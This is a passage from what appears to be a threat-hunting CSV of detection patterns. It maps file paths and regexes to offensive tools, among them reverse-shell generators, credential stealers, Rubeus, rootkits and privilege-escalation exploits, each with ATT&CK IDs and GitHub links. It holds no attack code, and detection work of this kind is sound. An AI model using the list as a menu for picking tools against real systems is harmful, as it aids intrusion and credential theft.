","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\revshell.py*",".{0,1000}\\revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*\revshell32.bin*",".{0,1000}\\revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\revshell64.bin*",".{0,1000}\\revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" 
"*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\revsocks\*.go*",".{0,1000}\\revsocks\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\revsocks\make.bat*",".{0,1000}\\revsocks\\make\.bat.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*\revsocks-master\*",".{0,1000}\\revsocks\-master\\.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\rfs_injection.exe*",".{0,1000}\\rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*\rid_hijack.rb*",".{0,1000}\\rid_hijack\.rb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\RID-Hijacking\*",".{0,1000}\\RID\-Hijacking\\.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\RID-Hijacking-master*",".{0,1000}\\RID\-Hijacking\-master.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\rm_injection.exe*",".{0,1000}\\rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ROADtools\*",".{0,1000}\\ROADtools\\.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*\Roblox Cookies.txt*",".{0,1000}\\Roblox\sCookies\.txt.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*\roboform\app\getCredsroboformapp.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\app\getCredsroboformapp2.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different 
password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\app\getCredsroboformapp3.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\roboform\plugin\getCredsroboformplugin.h*",".{0,1000}\\roboform\\plugin\\getCredsroboformplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\RogueOxidResolver.cpp*",".{0,1000}\\RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RogueWinRM.sln*",".{0,1000}\\RogueWinRM\.sln.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" 
"*\RogueWinRM\*",".{0,1000}\\RogueWinRM\\.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*\Rootkit.cpp*",".{0,1000}\\Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\ROT Shellcode Encoder.csproj*",".{0,1000}\\ROT\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 
Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\rpcrt.py",".{0,1000}\\rpcrt\.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*\rpt_win.exe",".{0,1000}\\rpt_win\.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\rsocx.exe*",".{0,1000}\\rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*\rt_hijacking.exe*",".{0,1000}\\rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Rubeus.*",".{0,1000}\\Rubeus\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Rubeus\*",".{0,1000}\\Rubeus\\.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\RubeusRoast.cs*",".{0,1000}\\RubeusRoast\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\ruler.exe*",".{0,1000}\\ruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*\run\john *",".{0,1000}\\run\\john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.*",".{0,1000}\\run\\john\\.{0,1000}\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.com*",".{0,1000}\\run\\john\\.{0,1000}\.com.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.pl*",".{0,1000}\\run\\john\\.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.py*",".{0,1000}\\run\\john\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\RunasCs.cs*",".{0,1000}\\RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*\runasppl.py*",".{0,1000}\\runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\RunAsWinTcb\*",".{0,1000}\\RunAsWinTcb\\.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\RunBOF.exe*",".{0,1000}\\RunBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\runcalc.dll*",".{0,1000}\\runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\runcmd.lua*",".{0,1000}\\runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - 
T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\runcmd2.lua*",".{0,1000}\\runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\Running_msf_revshell*",".{0,1000}\\Running_msf_revshell.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\RunOF.exe*",".{0,1000}\\RunOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\RunOF\bin\*",".{0,1000}\\RunOF\\bin\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" 
"*\RunPEinMemory.exe*",".{0,1000}\\RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\RunPEinMemory64.exe*",".{0,1000}\\RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\runswhide.lua*",".{0,1000}\\runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation 